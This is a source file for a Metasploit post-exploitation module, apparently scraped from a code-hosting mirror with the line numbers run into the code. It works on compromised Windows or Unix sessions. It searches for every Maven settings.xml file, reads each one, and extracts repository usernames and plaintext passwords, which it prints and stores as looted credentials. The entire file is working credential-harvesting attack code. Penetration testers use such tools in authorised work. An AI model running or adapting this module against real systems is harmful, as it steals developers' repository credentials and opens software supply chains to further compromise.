Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/multi/gather/maven_creds.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'nokogiri'67class MetasploitModule < Msf::Post8include Msf::Post::File9include Msf::Post::Unix1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Multi Gather Maven Credentials Collection',16'Description' => %q{17This module will collect the contents of all users settings.xml on the targeted18machine.19},20'License' => MSF_LICENSE,21'Author' => ['elenoir'],22'Platform' => %w[bsd linux osx unix win],23'SessionTypes' => ['shell', 'meterpreter'],24'Compat' => {25'Meterpreter' => {26'Commands' => %w[27core_channel_eof28core_channel_open29core_channel_read30core_channel_write31]32}33}34)35)36end3738def gathernix39print_status('Unix OS detected')40files = cmd_exec('locate settings.xml').split("\n")41# Handle case where locate does not exist (error is returned in first element)42if files.length == 1 && !directory?(files.first)43files = []44paths = enum_user_directories.map { |d| d }45if paths.nil? || paths.empty?46print_error('No users directory found')47return48end49paths.each do |path|50path.chomp!51file = 'settings.xml'52target = "#{path}/#{file}"53if file? target54files.push(target)55end56end57end58return files59end6061def gatherwin62print_status('Windows OS detected')63return cmd_exec('cd\ && dir settings.xml /b /s').split("\n")64end6566def run67print_status('Finding user directories')68files = ''69case session.platform70when 'windows'71files = gatherwin72when 'unix', 'linux', 'bsd', 'osx'73files = gathernix74else75print_error('Incompatible platform')76end77if files.nil? || files.empty?78print_error('No settings.xml file found')79return80end81download_loot(files)82end8384def download_loot(files)85print_status("Looting #{files.count} files")86files.each do |target|87target.chomp!88if file? target89print_status("Downloading #{target}")90extract(target)91end92end93end9495def parse_settings(target, data)96xml_doc = Nokogiri::XML(data)97xml_doc.remove_namespaces!9899xml_doc.xpath('//server').each do |server|100id = server.xpath('id').text101username = server.xpath('username').text102password = server.xpath('password').text103104print_status('Collected the following credentials:')105print_status(' Id: %s' % id)106print_status(' Username: %s' % username)107print_status(' Password: %s' % password)108109print_status('Try to find url from id...')110realm = ''111112xml_doc.xpath("//mirror[id = '#{id}']").each do |mirror|113realm = mirror.xpath('url').text114print_status("Found url in mirror : #{realm}")115end116117if realm.blank?118xml_doc.xpath("//repository[id = '#{id}']").each do |repository|119realm = repository.xpath('url').text120print_status("Found url in repository : #{realm}")121end122end123124if realm.blank?125print_status('No url found, id will be set as realm')126realm = id127end128129print_line('')130131credential_data = {132origin_type: :import,133module_fullname: fullname,134filename: target,135service_name: 'maven',136realm_value: realm,137realm_key: Metasploit::Model::Realm::Key::WILDCARD,138private_type: :password,139private_data: password,140username: username,141workspace_id: myworkspace_id142}143create_credential(credential_data)144end145end146147def extract(target)148print_status("Reading settings.xml file from #{target}")149data = ''150if session.type == 'shell'151data = session.shell_command("cat #{target}")152else153settings = session.fs.file.new(target.to_s, 'rb')154data << settings.read until settings.eof?155end156157parse_settings(target, data)158end159end160161162